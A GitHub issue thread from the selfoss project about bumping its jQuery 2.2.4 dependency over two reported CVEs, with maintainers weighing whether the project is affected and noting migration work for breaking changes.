Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Bump jQuery version #1029

Closed
SSilence opened this issue Mar 24, 2018 · 2 comments · Fixed by #1244
Closed

Bump jQuery version #1029

SSilence opened this issue Mar 24, 2018 · 2 comments · Fixed by #1244
Labels
enhancement
Milestone
2.19

Comments

@SSilence
Copy link
Member

github reports two security issues with current jquery version 2.2.4 used in public/package.json:
https://nvd.nist.gov/vuln/detail/CVE-2016-10707
https://nvd.nist.gov/vuln/detail/CVE-2015-9251
@jtojnar jtojnar added this to the 2.19 milestone Mar 24, 2018
@niol
Copy link
Collaborator

niol commented Mar 26, 2018

For CVE-2016-10707, I do not think selfoss does AJAX requests to third party sites, so it should not be vulnerable.
For CVE-2015-9251, selfoss does not seem to use the attr function with third party supplied data.

@jtojnar jtojnar mentioned this issue Sep 25, 2019
Merged
@jtojnar
Copy link
Member

jtojnar commented Oct 15, 2019

Quoting from #1134 (comment):

There are many breaking changes regarding to Deferred, which will need to be manually checked. And we should probably switch to A+-style promises throughout the codebase.

The remaining deprecations and breaking changes should be addressed in 8e991c4, except for bind() deprecation. That is better left for a separate PR.

@jtojnar jtojnar modified the milestones: 2.19, 3.0 Oct 15, 2019
@jtojnar jtojnar changed the title security vulnerabilities in jquery version Bump jQuery version Oct 16, 2019
@jtojnar jtojnar mentioned this issue Nov 2, 2019
Closed
@jtojnar jtojnar modified the milestones: 3.0, 2.19 Sep 14, 2020
@jtojnar jtojnar mentioned this issue Jan 8, 2021
Closed
@jtojnar jtojnar mentioned this issue Jan 26, 2021
Merged
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
enhancement
Projects
None yet
Milestone
2.19
Development

Successfully merging a pull request may close this issue.

Upgrade jQuery fossar/selfoss
3 participants
@SSilence @jtojnar @niol